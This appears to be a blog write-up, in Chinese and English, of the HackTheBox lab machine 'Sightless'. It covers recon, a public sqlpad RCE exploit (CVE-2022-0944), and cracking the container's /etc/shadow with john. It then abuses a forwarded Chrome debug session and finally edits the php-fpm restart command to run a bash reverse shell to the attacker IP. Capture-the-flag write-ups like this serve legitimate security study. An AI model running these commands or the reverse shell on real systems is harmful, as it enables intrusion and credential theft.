Sightless on HackTheBox

, ,

Before all

蠻喜歡這台機器,算 real world 又有一些 rabbit hole
Victim’s IP : 10.10.11.32
Victim’s Host : *.sightless.htb
Attacker’s IP : 10.10.14.114

RECON

port scan

Command 

1
rustscan -a 10.10.11.32 --ulimit 5000 -- -sC -sV -Pn

Result 

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
PORT   STATE SERVICE REASON         VERSION
21/tcp open  ftp     syn-ack ttl 63
| fingerprint-strings: 
|   GenericLines: 
|     220 ProFTPD Server (sightless.htb FTP Server) [::ffff:10.10.11.32]
|     Invalid command: try being more creative
|_    Invalid command: try being more creative
22/tcp open  ssh     syn-ack ttl 63 OpenSSH 8.9p1 Ubuntu 3ubuntu0.10 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   256 c9:6e:3b:8f:c6:03:29:05:e5:a0:ca:00:90:c9:5c:52 (ECDSA)
| ecdsa-sha2-nistp256 AAAAE2VjZHNhLXNoYTItbmlzdHAyNTYAAAAIbmlzdHAyNTYAAABBBGoivagBalUNqQKPAE2WFpkFMj+vKwO9D3RiUUxsnkBNKXp5ql1R+kvjG89Iknc24EDKuRWDzEivKXYrZJE9fxg=
|   256 9b:de:3a:27:77:3b:1b:e1:19:5f:16:11:be:70:e0:56 (ED25519)
|_ssh-ed25519 AAAAC3NzaC1lZDI1NTE5AAAAIA4BBc5R8qY5gFPDOqODeLBteW5rxF+qR5j36q9mO+bu
80/tcp open  http    syn-ack ttl 63 nginx 1.18.0 (Ubuntu)
|_http-server-header: nginx/1.18.0 (Ubuntu)
| http-methods: 
|_  Supported Methods: GET HEAD
|_http-title: Sightless.htb

簡言之,有ssh/ftp/http services

subdomain discovery

image
連上 sightless.htb 後點擊按鈕,找到sqlpad.sightless.htb

Exploit

CVE-2022-0944

點下 About,找到版本:Version: 6.10.0
適用於PoC https://github.com/0xRoqeeb/sqlpad-rce-exploit-CVE-2022-0944/tree/main
Get Shell,不過在一個 Docker 環境內:
image

Privilege Escalation

/etc/shadow cracking

於容器內獲得 /etc/shadow 檔案及 /etc/passwd 檔案,載到攻擊者主機後利用 unshadow 及 john 進行字典攻擊 

1
2
unshadow passwd shadow > etc_hash
john etc_hash --wordlist=/home/kali/rockyou.txt
1
2
blindside        (root)     
insaneclownposse (michael)

最後 michael 的權限可透過ssh登入成功 

1
ssh [email protected]

Abusing chrome debug

以ssh進入主機後找到chrome debug開啟的狀況
image
ss -tulnp 命令挖掘到內網的8080 port有服務,以 ssh port forward 到本機:
內網 port 分布: 

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
Netid   State    Recv-Q   Send-Q     Local Address:Port       Peer Address:Port   Process   
udp     UNCONN   0        0          127.0.0.53%lo:53              0.0.0.0:*                
udp     UNCONN   0        0                0.0.0.0:68              0.0.0.0:*                
tcp     LISTEN   0        511              0.0.0.0:80              0.0.0.0:*                
tcp     LISTEN   0        4096           127.0.0.1:3000            0.0.0.0:*                
tcp     LISTEN   0        128              0.0.0.0:22              0.0.0.0:*                
tcp     LISTEN   0        5              127.0.0.1:33415           0.0.0.0:*                
tcp     LISTEN   0        70             127.0.0.1:33060           0.0.0.0:*                
tcp     LISTEN   0        511            127.0.0.1:8080            0.0.0.0:*                
tcp     LISTEN   0        4096           127.0.0.1:46671           0.0.0.0:*                
tcp     LISTEN   0        10             127.0.0.1:46497           0.0.0.0:*                
tcp     LISTEN   0        4096       127.0.0.53%lo:53              0.0.0.0:*                
tcp     LISTEN   0        151            127.0.0.1:3306            0.0.0.0:*                
tcp     LISTEN   0        128                    *:21                    *:*                
tcp     LISTEN   0        128                 [::]:22                 [::]:*

port forward: 

1
ssh -L 8080:localhost:8080 [email protected]

同樣的方法把 port 33415, 46671 及 46497 也一起串出來
參考網路資料,先於chrome開啟chrome://inspect/#devices連結,點下configure並把剛剛幾個port以ip 127.0.0.1 加入紀錄
image
過沒多久就可以抓到連線請求,點下 inspect,從畫面中找到網站登入密碼:
image
登入後可以到http://admin.sightless.htb:8080/admin_phpsettings.php?page=fpmdaemons修改 php-fpm 重啟命令,如果直接改成reverse shell會被提示到格式不符
先在本機的 /tmp/rev.sh 建立reverse shell內容

1
sh -i >& /dev/tcp/10.10.14.114/9999 0>&1

最後只需要 chmod +x /tmp/rev.sh,然後把命令改成/tmp/rev.sh就好惹
image
於主機 port 9999 get root!
image